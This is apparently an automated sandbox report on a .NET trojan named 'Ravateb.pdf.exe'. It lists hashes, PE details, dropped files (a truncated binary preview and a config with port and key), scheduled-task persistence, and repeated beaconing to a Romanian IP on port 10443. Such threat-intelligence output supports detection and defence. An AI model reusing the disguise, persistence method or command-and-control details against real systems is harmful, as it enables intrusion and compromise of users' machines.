C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe | 46% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://89.46.233.239/resource | 0% | Avira URL Cloud | safe


          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://89.46.233.239/resource | false | Avira URL Cloud: safe | unknown

Reputation legend:
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
89.46.233.239 | unknown | Romania | 39531 | ALTER-NET-ASZorilorNr11SfGheorgheRO | false
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1636359
          Start date and time:2025-03-12 17:36:12 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 19s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Ravateb.pdf.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@2/3@0/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 61%
          • Number of executed functions: 87
          • Number of non-executed functions: 14
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target Ravateb.pdf.exe, PID 7532 because it is empty
          • Execution Graph export aborted for target windowsObject.exe, PID 7368 because it is empty
• Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
12:37:40 | API Interceptor | 16x Sleep call for process: windowsObject.exe modified
16:37:29 | Task Scheduler | Run new task: MonitorUpdate path: C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe s>-time 6.9.2018
          No context
          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALTER-NET-ASZorilorNr11SfGheorgheRO | pp.dd.exe | malicious | Unknown | 93.115.172.125
ALTER-NET-ASZorilorNr11SfGheorgheRO | RPV.exe | malicious | I2PRAT | 93.115.172.125
ALTER-NET-ASZorilorNr11SfGheorgheRO | pTVKHqys2h.exe | malicious | Xmrig | 93.115.172.41
ALTER-NET-ASZorilorNr11SfGheorgheRO | pXlV6TKi3E.exe | malicious | Sality | 89.46.234.189
ALTER-NET-ASZorilorNr11SfGheorgheRO | boatnet.x86 | malicious | Mirai | 89.46.238.151
ALTER-NET-ASZorilorNr11SfGheorgheRO | jRBdJBRpya | malicious | Mirai | 89.46.234.98
          No context
          No context
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1256
          Entropy (8bit):5.374602683269243
          Encrypted:false
          SSDEEP:24:ML9E4KQ71qE4GIs0E4K6sXE4NpOKDE4KGKZI6KhgLE4qE4j:MxHKQ71qHGIs0HKJHNpOYHKGSI6ogLH0
          MD5:30DF38800889AFFA36F245B0B93E739D
          SHA1:7B1FA4068DBB69602DC6A1F29FEC85A59C9C1A2D
          SHA-256:15E36C0B1FC39352D3949DB000A79241847FFC3CD92464D7F8A33AC7DD476F9B
          SHA-512:5EA97C947E03156BE300E575FA0100F325B48737333F3AFF901A387DC5DFC96EB6CF1896371D59F15C0AC80A05B5EB1478995293779FFFCC7D920CFD4301C41A
          Malicious:true
          Reputation:low
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.3
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):22016
          Entropy (8bit):5.404827374048407
          Encrypted:false
          SSDEEP:384:2+zNEKEzqLsr037UGawZontu+cGeC1gtk9EhKwQ4qEQuBhCUIZ:2+gysg37EUSGfjVQuA
          MD5:2BC1C670A5C179E58F6C33C7469B9D98
          SHA1:A4E19863DD1272897E64C9A0E8C78D2955196020
          SHA-256:4CF084851C46DAAF46D3D805CF76D01D9910DCBD9E314FACE1A3684C869243EC
          SHA-512:D8C10907A34B739D012A23098941A3C2B52E37CA350778A36813E7123FCDDBAC58FDA04CFF9A6B64EE16B5745A924E1D3521C45863B8746770811671EE5AF14B
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 46%
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1............"...0..J...........i... ........@.. ....................................@..................................h..O.......|............................h............................................... ............... ..H............text...HI... ...J.................. ..`.rsrc...|............L..............@..@.reloc...............T..............@..B.................h......H........7..p0...........g...............................................0..n.......s.......}......}......}....s.....(....... ...s.....o....o...+....o....,..o........o....r...ps....z.,..o......*........!.Ab.......0............(.......(....*.0.............2...%..{.....%.r;..p.%..{.....%.r;..p.%..{.....%.r;..p.(....}....r?..p(.....(....rW..po....( ...}..... ....(....r[..po....( ...Z}..... ....(....ro..po....( ...Z}......(....r...po.....(....}.... .....X..Zj.#...=..9F#..../.>..
          Process:C:\Users\user\Desktop\Ravateb.pdf.exe
          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
          Category:dropped
          Size (bytes):365
          Entropy (8bit):5.125232360922898
          Encrypted:false
          SSDEEP:6:JiMVBd1IUyXI9VWmtClMyRO8pAqQYzAqT94Aq6wIeAqifU3QIT:MMHdGUyX2yRO+lXZ5c6wXifU3xT
          MD5:B02222CD7C9C9BFDFD46CCD81F07C72F
          SHA1:4E3893209D3277EC60B8724E17F2D319F6320939
          SHA-256:EEC4505CE406B8AE330D3B8CD3B589C02DD05727D9ECC43A3BAC0EFCDA2D7BA3
          SHA-512:D5301FACB0FE60AFE107A07F020D5275FB66D14BD4EBFDA24B56A01FBA208682078180B73C47610EDE780BD3CC1B129430E4300FD324EB995983224331328E00
          Malicious:true
          Reputation:low
          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <system.net>.. <defaultProxy useDefaultCredentials="true" />.. </system.net>.. <appSettings>.. <add key="P" value="10443" />.. <add key="lower_sec" value="60" />.. <add key="upper_sec" value="120" />... <add key="I" value="UXClxFCHX11IJEllWXFQHCg==" />.. </appSettings>..</configuration>
          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):4.553261821545199
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:Ravateb.pdf.exe
          File size:82'944 bytes
          MD5:e7d52ef521b8cd0b405575c185d64033
          SHA1:6bb4414d717a290b80cca32655b7198f0c832add
          SHA256:b607d60d680f1f1335902a666df843ac9cc58299af6731d2ad1a5ea617cf4a99
          SHA512:b5ac834fb2e4e041d065019d01ab62ed4f8b0fd27e0161a92a22e55d38f179551d7e24cbaa0bd3abaaff9cf6aae60f264839b4ce432dfc46d6e16b584211d935
          SSDEEP:1536:td3EbUIfBRgAZp/ou8eFT9UiDsgWjiPoihPmdD6Hw0QYsDN:3DIZTz1QDiE6HwdFD
          TLSH:A983B92529EB109DF3A79FB11FD8F8FF89AAE573691D70BA204147464B22D40CD12B36
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T............"...0.."... ......fA... ...`....@.. ....................................@................................
          Icon Hash:39620052d27a5300
          Entrypoint:0x414166
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0xB2D854D6 [Fri Jan 30 06:19:02 2065 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add dword ptr [eax], eax
          add byte ptr [eax], al
          add dword ptr [eax], eax
          add byte ptr [eax], al
          add al, byte ptr [eax]
          add byte ptr [eax], al
          add eax, dword ptr [eax]
          add byte ptr [eax], al
          add eax, 08000000h
          add byte ptr [eax], al
          add byte ptr [15000000h], cl
          add byte ptr [eax], al
          add byte ptr [edx], ah
          add byte ptr [eax], al
          add byte ptr [edi], dh
          add byte ptr [eax], al
          add byte ptr [edx], al
          add byte ptr [eax], al
          add byte ptr [ebx], al
          add byte ptr [eax], al
          add byte ptr [07000000h], al
          add byte ptr [eax], al
          add byte ptr [ebx], cl
          add byte ptr [eax], al
          add byte ptr [11000000h], cl
          add byte ptr [eax], al
          add byte ptr [ebx], dl
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14114 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x1c28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x140f8 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x121b8 | 0x12200 | 20a12407b43279cd431b9f10e970afff | False | 0.3464978448275862 | HA archive data 1 file, first is type CPY | 4.158951699170872 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x1c28 | 0x1e00 | ca858955b5ad341e5bcd8dd0832b5f0f | False | 0.7950520833333333 | data | 7.0782789679514355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x18000 | 0xc | 0x200 | 2c9c48cb0ff82bbd67d5c89118a260d9 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x16100 | 0x15d6 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9559928443649374
RT_GROUP_ICON | 0x176e8 | 0x14 | data | | | 1.05
RT_VERSION | 0x1770c | 0x31c | data | | | 0.4183417085427136
RT_MANIFEST | 0x17a38 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | windowsObject
FileVersion | 1.0.0.0
InternalName | windowsObject.exe
LegalCopyright |
LegalTrademarks |
OriginalFilename | windowsObject.exe
ProductName | windowsObject
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0


Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 12, 2025 17:37:40.134552956 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:40.139349937 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:40.139476061 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:40.143381119 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:40.148063898 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:41.406804085 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:41.406826973 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:41.406852961 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:41.406864882 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:41.406924963 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:41.406965017 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:41.407258034 CET | 49721 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:41.411926985 CET | 10443 | 49721 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:46.542702913 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:46.547493935 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:46.547585011 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:46.547920942 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:46.552593946 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417179108 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417197943 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417320967 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:47.417406082 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417417049 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417433023 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:47.417480946 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:47.417552948 CET | 49722 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:47.422187090 CET | 10443 | 49722 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:52.542623043 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:52.547491074 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:52.547611952 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:52.548002005 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:52.552702904 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.477308035 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.477336884 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.477425098 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:53.478241920 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.478290081 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.478343964 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:53.478351116 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:53.478408098 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:53.478436947 CET | 49723 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:53.483056068 CET | 10443 | 49723 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:58.605309010 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:58.610198975 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:58.610311031 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:58.610642910 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:58.615300894 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.484772921 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.484805107 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.484816074 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.484982967 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:59.485269070 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.485284090 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.485304117 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:37:59.485447884 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:59.485510111 CET | 49724 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:37:59.490130901 CET | 10443 | 49724 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:04.605309010 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:04.610115051 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:04.610188961 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:04.610944986 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:04.615590096 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.496951103 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.496964931 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.497049093 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:05.497402906 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.497411966 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.497426987 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:05.497458935 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:05.497477055 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:05.497617006 CET | 49726 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:05.502335072 CET | 10443 | 49726 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:10.620650053 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:10.625452042 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:10.625554085 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:10.625745058 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:10.630404949 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.492712975 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.492794991 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.492841959 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.492980957 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:11.493165016 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.493212938 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.493225098 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:11.493268967 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:11.493335009 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:11.493542910 CET | 49727 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:11.498184919 CET | 10443 | 49727 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:16.620347023 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:16.625143051 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:16.625235081 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:16.625381947 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:16.630142927 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503053904 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503071070 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503144979 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:17.503515005 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503551006 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503563881 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:17.503593922 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:17.503607035 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:17.608035088 CET | 49728 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:17.612715960 CET | 10443 | 49728 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:22.731324911 CET | 49729 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:22.736087084 CET | 10443 | 49729 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:22.736176968 CET | 49729 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:22.736578941 CET | 49729 | 10443 | 192.168.2.4 | 89.46.233.239
Mar 12, 2025 17:38:22.741276026 CET | 10443 | 49729 | 89.46.233.239 | 192.168.2.4
Mar 12, 2025 17:38:23.601264954 CET | 10443 | 49729 | 89.46.233.239 | 192.168.2.4
          Mar 12, 2025 17:38:23.601296902 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601309061 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601401091 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601636887 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601649046 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601686001 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601705074 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601742983 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601809978 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.607397079 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:28.731298923 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.736119032 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:28.736226082 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.736511946 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.741184950 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609715939 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609735012 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609819889 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610229015 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610239029 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610259056 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610289097 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610316992 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610383987 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.615040064 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:34.729855061 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.734641075 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:34.734775066 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.735253096 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.739933968 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607688904 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607707977 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607762098 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.607920885 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607930899 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607942104 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.608036995 CET4973110443192.168.2.489.46.233.239
